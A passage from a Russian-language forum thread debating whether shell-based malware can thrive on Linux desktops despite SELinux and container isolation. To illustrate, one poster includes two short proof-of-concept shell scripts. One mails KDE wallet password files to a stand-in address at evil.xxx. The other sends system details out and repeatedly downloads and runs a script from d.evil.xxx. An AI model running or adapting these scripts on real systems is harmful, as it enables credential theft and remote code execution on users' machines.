>[оверквотинг удален]
>>вирусов» и «вирусы для Linux». Да, «классическим» вирусам под Linux мало
>>что светит. А вот вирусы, использующие shell (покажите мне POSIX-систему без
>>/bin/sh), memory-only вирусы и т.д. вполне имеют шансы на жизнь —
>>по мере роста популярности *nix на десктопах (то есть среди неквалифицированных
>>пользователей) будет появляться всё больше заразы.
>
>Если Вы помните, в похожей теме я высказывала аналогичную мысль (про sh-вирусы),
>однако, Вы забываете о наличии MAC под Linux: тот же SELinux,
>если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде
>Postfix, если процесс работает не под рутом.PoC №1:
#!/bin/sh
dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man passwords' 'All this shit' "`echo ${KDEHOME:-~/.kde}/share/apps/kwallet/* | sed -e 's/ /:/g'`"
PoC №2:
#!/bin/sh
ID="`mktemp -u XXXXXXXXXXXXXXXXXXXXX`"
dmesg >/tmp/"$ID".dmesg
apt-get list >/tmp/"$ID".pkglist
dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man dmesg' "ID: ${ID}" /tmp/"$ID".dmesg:/tmp/"$ID".pkglist
rm /tmp/"$ID".d.txt
DOWNLOADER="`which wget` -O -"
if [ $? -ne 0]; then
DOWNLOADER="`which curl`"
fi
if [ $? -ne 0]; then
DOWNLOADER="`which ftp` -o -"
fi
while ! $DOWNLOADER "http://d.evil.xxx//${ID}" >/tmp/"$ID".killer; do sleep 3600; done
. /tmp/"$ID".killer
Etc.
>Эсплойты на рута, которые выключают SELinux, конечно, есть, но не стоит забывать
>так же о том, что массовый приход контейнеров на базе CGroups
>на Linux-десктопы (это очень соблазнительно, запускать тот же Firefox в контейнере)
>дело самого ближайшего будущего, так же не стоит забывать о том,
>что большинство эсплойтов и вирусов будет запускаться с привелегиями юзера/браузера, а,
>значит, эффективно пресекаться MAC, и изолироваться Cgroups(поспамить процессу просто не дадут!)
Самые опасные с точки зрения последствий зловреды прекрасно чувствуют себя под юзером. Ведь самое ценное что: а) пользовательские данные (пароли, документы, статистика, на худой конец); б) возможность что-то выполнять от имени вроде как аутентичного пользователя. А контейнеры сами по себе тоже не панацея — сколько уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили в системах виртуализации?..
>[оверквотинг удален]
>другие браузеры!
>+ еще можно вспомнить ActiveX.
>Из-за ряда смертельных ошибок в области дизайна, дизайна Security(которые до сих пор
>не исправлены - UAC это концептуально технология 70-х годов), ну и
>доброй традиции выпуска патчей _после_ появления эсплойта (а так же традиции
>выпуска эсплойта на основе того, что пришло в Windows Update), мы
>имеем _только_ на Windows миллионые ботнеты, тогда как на незащищенном Mac
>OS X, доля которого приближается в мире к 10%, миллионых ботнетов
>нет (а ведь непаханное поле! У скольки процентов MAc OS X
>юзеров есть антивирусы?)
Если развитие MacOS X будет идти теми же темпами, ситуация с ней скоро (в течение пары лет) «исправится». ;)